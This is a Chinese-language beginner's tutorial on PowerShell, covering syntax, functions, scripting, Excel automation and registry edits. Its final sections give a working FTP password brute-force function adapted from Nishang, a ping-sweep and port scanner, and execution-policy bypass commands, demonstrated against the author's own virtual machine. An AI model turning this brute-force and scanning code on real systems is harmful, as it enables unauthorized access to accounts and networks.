PowerShell入门学习

一、概要

• Powershell是运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境。
• powershell需要.NET环境的支持，同时支持.NET对象。之所以将Powershell 定位为Power，是因为它完全支持对象，且其可读性，易用性，可以位居当前所有shell之首
• powershell有四个版本，分别为1.0，2.0，3.0 ,4.0
  • 在window7或者Windows Server 2008中，内置有PowerShell 2.0，可以升级为3.0，4.0。
  • 在Windows 8 或者Windows server 2012中，内置有PowerShell 3.0，可以升级为4.0。
  • 在Windows 8.1或者Windows server 2012 R2中，默认是4.0版本。
• 以下知识点通过PowerShell 在线教程总结，更详细的可以进入到链接中学习！

二、PowerShell命令集

1、命令集cmdlets

• 类似于UNIX和CMD，PowerShell也有自己的命令———cmdlets是Powershell的内部命令，cmdlet的类型名为System.Management.Automation.CmdletInfo，在网上我找到了其中文说明，再用到的时候可以查找

2、别名

• 在上面我们可以发现cmdlet的名称由一个动词和一个名词组成，功能一目了然，但长度却过长。这时我们就需要用到“别名”了！Powershell内部也实现了很多常用命令的别名。例如Get-ChildItem，列出当前的子文件或目录。它有两个别名：ls和dir，这两个别名来源于unix的shell和windows的cmd。
• 可以通过Get-Alias -name 别名查询别名所指的真实cmdlet命令
  
  
• 查看可用的别名：ls alias:或Get-Alias
• 查看所有别名和指向cmdlet的别名的个数（按降序排列）：ls alias: | Group-Object definition | sort -Descending Count
  
  
  
  上图为一部分结果

三、Powershell语法

1、变量

• 变量都是以&开头的，剩余字符可以是数字、字母、下划线的任意字符，且不区分大小写。
• 变量赋值符=，其几乎可以把任何数据赋值给一个变量
  
  
• 交换两个变量的值
  
  
• 自动变量
  • 一旦打开Powershell就会自动加载的变量
  • 列表传送->
• 指定类型定义变量：[变量类型]$变量名

2、数组

• 创建数组
  • $array = 1,2,3,4
  • $array = 1..4
  • $array=1,"2017",([System.Guid]::NewGuid()),(get-date)
  • $a=@() # 空数组
  • $a=,"1" # 一个元素的数组
• 访问数组：$array[0]
  
  
• 判断一个变量是否为数组：$test -is [array]
• 数组的追加：$books += "元素4"
• 强类型数组：[int[]] $nums=@()
• 哈希表：使用数字寻址或数据类型进行寻址
  • 创建哈希表：$stu=@{ Name = "小明";Age="12";sex="man" }
  • 如上可使用$stu["Name"]访问对应Name的值
  • 可以在创建哈希表时就使用数组：$stu=@{ Name = "小明";Age="12";sex="男";Books="三国演义","围城","哈姆雷特" }
  • 哈希表的插入与删除:

    $Student=@{}
    $Student.Name="hahaha"
    $stu.Remove("Name")
    

3、条件判断

• 比较运算符
  • -eq：等于
  • -ne：不等于
  • -gt：大于
  • -ge：大于等于
  • -lt：小于
  • -le：小于等于
  • -contains：包含
  • -notcontains：不包含
• 布尔运算
  • -and：和
  • -or：或
  • -xor：异或
  • -not：逆
• if-else语句

  if（条件满足）{
    如果条件满足就执行代码
  }
  else
  {
    如果条件不满足
  }
  

• 循环语句while

  while($n -gt 0){
      code
  }
  

四、Powershell函数

1、定义函数

• 函数的结构由三部分组成：函数名，参数，函数体

  Function FuncName （args[]）
  {
      code;
  }
  

• 删除函数
  • 控制台定义的函数只会在当前会话生效，一旦控制台退出，会自动消失。
  • 在不关闭控制台的条件下删除一个已经定义好的函数，可是使用虚拟驱动器的方法：del Function:函数名

2、函数的参数

• 万能参数：给一个函数定义参数最简单的是使用$args这个内置的参数。它可以识别任意个参数。尤其适用哪些参数可有可无的函数。$args是一个数组类型。

  function sayHello
  {
    if($args.Count -eq 0)
    {
        "No argument!"
    }
    else
    {
        $args | foreach {"Hello,$($_)"}
    }
  }
  

  • 无参数调用时：sayHello
  • 一个参数调用：sayHello LiLi
  • 多个参数调用时：sayHello LiLi Lucy Tom
• 设置参数名称并定义默认值

  function StringContact($str1="moss",$str2="fly")
  {
      return $str1+$str2
  }
  

• Return语句
  • Powershell会将函数中所有的输出作为返回值，但是也可以通过return语句指定具体的我返回值。
  • Return语句会将指定的值返回，同时也会中断函数的执行，return后面的语句会被忽略。

3、异常处理

Try{
    $connection.open()
    $success = $true
}Catch{
    $success = $false
}

4、支持的函数

• Powershell已经提供了许多用户能够使用的预定义函数，这些函数可以通过Function:PSDrive虚拟驱动器查看
  
  
• 作用
  • Clear-Host：清除屏幕的缓存
  • help,man：查看命令的帮助文档
  • mkdir,md：通过new-Item创建子目录
  • more：分屏输出管道结果
  • prompt：返回提示文本
  • TabExpansion：Tab键的自动完成提示
  • X：调用Set-Location定位到指定的驱动器根目录

五、Powershell脚本

• 编写
  • 如果脚本不是很长，可以直接在控制台中要执行的语句重定向给一个脚本文件。
    
    
  • 非常方便的还是用文本文档编辑器，编辑完保存为.ps1后缀即可。
• 运行
  • .\路径\文件名
  • 将脚本的执行语句保存为别名，可以像执行一个命令一样执行一个脚本
    
    
• PowerShell也有自己的集成开发环境——PowerShell ISE来编写脚本，也就是我们常见的IDE环境，用起来很方便~我参考学习了如何利用Powershell ISE调试PS脚本
• cmd本地权限绕过执行：PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

六、Powershell管道和重定向

1、管道

• 把上一条命令的输出作为下一条命令的输入
• 例：通过ls获取当前目录的所有文件信息，然后通过Sort -Descending对文件信息按照Name降序排列，最后将排序好的文件的Name和Mode格式化成Table输出
  
  

2、重定向

• 把命令的输出保存到文件中，>为覆盖，>>为追加。
  
  

七、应用

1、Office互操作

• PowerShell可以通过COM接口和Office程序交互，最常用的是操作Excel，下面我们开始学习操作Excel。
• 创建一个可见的Excel对象：$excel.Visible=$true
• 打开一个现成的工作簿：$workbook = $excel.Workbooks.Open("XXX.xlsx")
• 创建一个新的工作簿：$workbook = $excel.Workbooks.Add()
• 选择某一个工作表（这里的下标从一开始）：$worksheet = $workbook.Worksheets.Item(1)
• 保存修改后的工作表：$workbook.SaveAs("D:\Desktop\hello.xlsx")
• 操作数据
  • 利用以上语法我们对已存在的一个Excel表格进行数据的写入。
    • 打印九九乘法表

      $excel = New-Object -ComObject Excel.Application
      $workbook = $excel.Workbooks.Open("C:\Users\zyx\Desktop\1.xlsx")
      $worksheet = $workbook.Worksheets.Item(1)
      for ($i = 1; $i -le 9; $i++) {
         # 第一行
         $worksheet.Cells.item(1, $i + 1) = $i
         # 第一列
         $worksheet.Cells.item($i + 1, 1) = $i
         # 它们的乘积
         for ($j = 1; $j -le 9; $j++) {
           $worksheet.Cells.item($i + 1, $j + 1) = $i * $j
        }
      }
      

    • 命令行运行上面脚本
      
      
  • 读取一个Excel表格中的数据

    $excel = New-Object -ComObject Excel.Application
    $workbook = $excel.Workbooks.Open("C:\Users\zyx\Desktop\1.xlsx")
    $worksheet = $workbook.Worksheets.Item(1)
    for ($i = 1; $i -le 10; $i++) {
       for ($j = 1; $j -le 10; $j++) {
          Write-Host -NoNewline $worksheet.Cells.item($i, $j).Text "`t"
       }
       Write-Host
    }
    

    里面的`t是PowerShell中的制表符，每个数据之间使用制表符来分隔；write-host为写到控制台，-NoNewline表示显示在控制台的信息不以换行结尾。
    
    

2、文件管理

• 文件管理命令。
  • Set-Location：别名cd，切换工作目录。
  • Get-Location：别名pwd，获取当前工作目录。
  • Get-ChildItem：获取当前目录下的所有文件。
  • Get-Item：获取给定文件的信息。
  • Get-Command -Noun item：查看所有文件操作的命令。
• 如我们查看桌面上某个应用的信息，可以使用Get-Item .\名称.lnk（因为基本为快捷方式所以需要lnk后缀）
  
  

3、注册表操作

• 读取注册表
  • 工作目录切换到某个注册表内：Set-Location 'HKCU:\Control Panel\Desktop\MuiCached'
  • 获取当前目录下注册表键的值：Get-Item .
    
    
  • 获取当前注册表项的属性值：Get-ItemProperty . MachinePreferredUILanguages
• 编辑注册表项
  • 我们修改一个安全的注册表：$path = "HKCU:\Control Panel\Desktop"
  • 新建注册表项：New-Item –Path $path –Name HelloKey
  • 修改项的属性：Set-ItemProperty -path $path\hellokey -name Fake -Value fuck
    
    
  • 删除项的属性：Remove-ItemProperty -path $path\hellokey -name Fake
  • 删除整个注册表项：Remove-Item -path $path\hellokey -Recurse

4、将自己编写的简单脚本变成工具供他人使用

• 我们使用PowerShell自带的开发工具PowerShell ISE来编写脚本
• 我们首先借用WMI对象写一个可以输出计算机C盘信息的命令：Get-WmiObject win32_logicaldisk | ?{$_.DeviceID -like "C:"}
• 接下来我们指定某个计算机：Get-WmiObject -computername localhost -class win32_logicaldisk | ?{$_.DeviceID -like "C:"}
• 我们的目的是给别人这个脚本，对方直接调用这个脚本后直接输入命令就可以用啦
• 现在将其写入一个脚本，我们可以使用ctrl+J看到脚本大概的格式并运用，内容如下：

  <#
  .Synopsis
     This is for diskinfo
  .DESCRIPTION
     This is for remote computer
  .EXAMPLE
     diskinfo -computername remote
  #>
  function Get-diskinfo
  {
    [CmdletBinding()]
    Param
    (
        # Param 帮助描述
        [Parameter(Mandatory=$true)]
        [string[]]$ComputerName,
        $bogus
    ) 
  
    Get-WmiObject -computername $ComputerName -class win32_logicaldisk | ?{$_.DeviceID -like "C:"}
  }
  

• 我们可以运行脚本.\Diskinfo.ps1，通过Get-help Diskinfo -full查看使用解释等等
• 现在我们就可以使用我们写的这个简单的脚本工具了
  • 调用脚本：. .\Diskinfo.ps1
  • 使用：get-diskinfo -ComputerName localhost
    
    

5、服务爆破

• 借助Nishang中的渗透脚本，我们对FTP爆破

• 首先在我的虚拟机win7中开启ftp服务，参考win7下如何建立ftp服务器

• 测试ftp

  • 网页输入ftp://IP地址会提示输入用户名和密码
    
    
  • 可以登陆进去即可

• 修改脚本，内容如下：

  function Invoke-BruteForce
  {
  
    [CmdletBinding()] Param(
        [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
        [Alias("PSComputerName","CN","MachineName","IP","IPAddress","Identity","Url","Ftp","Domain","DistinguishedName")]
        [String]
        $ComputerName,
  
        [Parameter(Position = 1, Mandatory = $true, ValueFromPipeline=$true)]
        [Alias('Users')]
        [String]
        $UserList,
  
        [Parameter(Position = 2, Mandatory = $true)]
        [Alias('Passwords')]
        [String]
        $PasswordList,
  
        [Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","LocalAccounts","Web")]
        [String]
        $Service = "FTP",
  
        [Parameter(Position = 4, Mandatory = $false)]
        [Switch]
        $StopOnSuccess,
  
        [Parameter(Position = 6, Mandatory = $false)]
        [UInt32]
        $Delay = 0
    )
  
    Process
    {
        # Write-Verbose用于打印详细信息
        Write-Verbose "Starting Brute-Force and Delay is $Delay."
  
        # 获取用户名与密码字典
        $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList
        $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList
        if (!$usernames) {
            $usernames = $UserList
            Write-Verbose "UserList file does not exist."
            Write-Verbose $usernames
        }
        if (!$passwords) {
            $passwords = $PasswordList
            Write-Verbose "PasswordList file does not exist."
            Write-Verbose $passwords
        }
  
        # Brute Force FTP
        if ($service -eq "FTP")
        {
            # 机器名的处理：若ftp://开始直接获取名字，若没有直接加上
            if($ComputerName -notMatch "^ftp://")
            {
                $source = "ftp://" + $ComputerName
            }
            else
            {
                $source = $ComputerName
            }
            Write-Output "Brute Forcing FTP on $ComputerName"
  
            :UsernameLoop foreach ($username in $usernames)
            {
                foreach ($Password in $Passwords)
                {
                    try
                    {
                        # 调用.net中的FTP库进行连接
                        $ftpRequest = [System.Net.FtpWebRequest]::Create($source)
                        $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
  
                        # 通过Verbose输出的信息
                        Write-Verbose "Trying $userName : $password"
  
                        # 进行认证连接
                        $ftpRequest.Credentials = new-object System.Net.NetworkCredential($userName, $password)
  
                        # 获取返回信息
                        $result = $ftpRequest.GetResponse()
                        $message = $result.BannerMessage + $result.WelcomeMessage
  
                        # 打印信息到控制台
                        Write-Output "Match $username : $Password"
                        $success = $true
  
                        # 判断是否要得到结果立刻退出
                        if ($StopOnSuccess)
                        {
                            break UsernameLoop
                        }
                    }
  
                    catch
                    {
                        $message = $error[0].ToString()
                        $success = $false
                    }
                    # 延时爆破
                    Start-Sleep -Seconds $Delay
                }
            }
        }
    }
  
  }
  

  阅读相关手册对一些参数进行解读

  属性名	可选参数值	属性说明
  CmdletBinding类		定义PowerShell的行为
  Parameter类		定义的参数为静态参数
  Mandatory	$True, $False	指定参数是否是必要参数，强制用户输入
  Position	整数	指定参数位置，如果用户没有指定具体参数名称，那么PowerShell将根据该值按序填充相应的参数
  ValueFromPipeline	$True, $False	是否接受来自管道中的值
  Alias	字符串	指定参数的另一个名称
  ValidateSet	集合	检验参数值是否在指定的属性集合中
  ErrorAction		抑制内置的错误消息，将ErrorAction设置为“SilentlyContinue”，错误信息就不会输出了

• 运行爆破：

  • 先调用该脚本：. .\ps.ps1
  • 开始爆破：Invoke-BruteForce -ComputerName localhost地址 -UserList C:\Users\zyx\Desktop\username.txt -PasswordList C:\Users\zyx\Desktop\pass.txt -Service ftp
  • 也可以直接用这个命令：powershell –exec bypass –Command "& {Import-Module 'C:\Users\zyx\Desktop\ps.ps1';Invoke-BruteForce -ComputerName localhost地址 -UserList C:\Users\zyx\Desktop\username.txt -PasswordList C:\Users\zyx\Desktop\pass.txt -Service ftp }"

• 结果
  
  

5、端口扫描器

• 以下脚本使用CmdletBinding的方法，来设置参数的形式
• 主机存活检测使用Ping来检测(ICMP)
• 端口扫描调用.NET的Socket来进行端口连接，如果连接建立代表端口连接成功

  function PortScan {
  [CmdletBinding()] Param(
        [parameter(Mandatory = $true, Position = 0)]
        [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
        [string]
        $StartAddress,
  
        [parameter(Mandatory = $true, Position = 1)]
        [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
        [string]
        $EndAddress,
  
        [switch]
        $GetHost,
  
        [switch]
        $ScanPort,
  
        [int[]]
        $Ports = @(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1086,1723,1433,1521,2375,3128,3306,3389,3690,5432,5800,5900,6379,7001,7002,7778,8000,8001,8080,8081,8089,8161,8888,9000,9001,9060,9200,9300,9080,9090,9999,10051,11211,27017,28017,50030),
  
        [int]
        $TimeOut = 100
    )
    Begin {
        # 开始之前先调用Ping组件
        $ping = New-Object System.Net.Networkinformation.Ping
    }
    Process {
        # 四层循环获取解析IP地址
        foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
            foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
            foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
                foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
                    # write-progress用于在shell界面显示一个进度条
                    write-progress -activity PingSweep -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100)
                    # 通过Ping命令发送ICMP包探测主机是否存活
                    $pingStatus = $ping.Send("$a.$b.$c.$d",$TimeOut)
                    if($pingStatus.Status -eq "Success") {
                        if($GetHost) {
                            # 本分支主要解决主机名的问题
                            # write-progress用于在shell界面显示一个进度条
                            write-progress -activity GetHost -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100) -Id 1
                            # 获取主机名
                            $getHostEntry = [Net.DNS]::BeginGetHostEntry($pingStatus.Address, $null, $null)
                        }
                        if($ScanPort) {
                            # 定义一个开放的端口数组, 存储开放的端口
                            $openPorts = @()
                            for($i = 1; $i -le $ports.Count;$i++) {
                                $port = $Ports[($i-1)]
                                # write-progress用于在shell界面显示一个进度条
                                write-progress -activity PortScan -status "$a.$b.$c.$d" -percentcomplete (($i/($Ports.Count)) * 100) -Id 2
                                # 定义一个Tcp的客户端
                                $client = New-Object System.Net.Sockets.TcpClient
                                # 开始连接
                                $beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
                                if($client.Connected) {
                                    # 加入开放的端口
                                    $openPorts += $port
                                } else {
                                # 等待, 这里用于网络延迟, 防止因为网络原因而没有判断到端口的开放而错失很多机会
                                    Start-Sleep -Milli $TimeOut
                                    if($client.Connected) {
                                        $openPorts += $port
                                    }
                                }
                                $client.Close()
                            }
                        }
                        if($GetHost) {
                            # 获取主机名
                            $hostName = ([Net.DNS]::EndGetHostEntry([IAsyncResult]$getHostEntry)).HostName
                        }
                        # 返回对象-哈希表
                        New-Object PSObject -Property @{
                        IPAddress = "$a.$b.$c.$d";
                        HostName = $hostName;
                        Ports = $openPorts
                        } | Select-Object IPAddress, HostName, Ports
                    }
                }
            }
            }
        }
     }
  }
  

• 开始扫描：
  • 调用脚本：. .\PortSan.ps1
  • 扫描：PortScan -StartAddress 192.168.38.1 -EndAddress 192.168.38.254 -GetHost -ScanPort
  • 也可以使用：powershell –exec bypass –Command "& {Import-Module 'C:\Users\zyx\Desktop\PortScan.ps1';PortScan -StartAddress 192.168.38.1 -EndAddress 192.168.38.254 -GetHost -ScanPort }"
• 扫描结果
  
  

参考资料

• PowerShell 在线教程
• Powershell应用
• Powershell攻击指南黑客后渗透之道系列——基础篇
• powershell 渗透框架[ nishang ]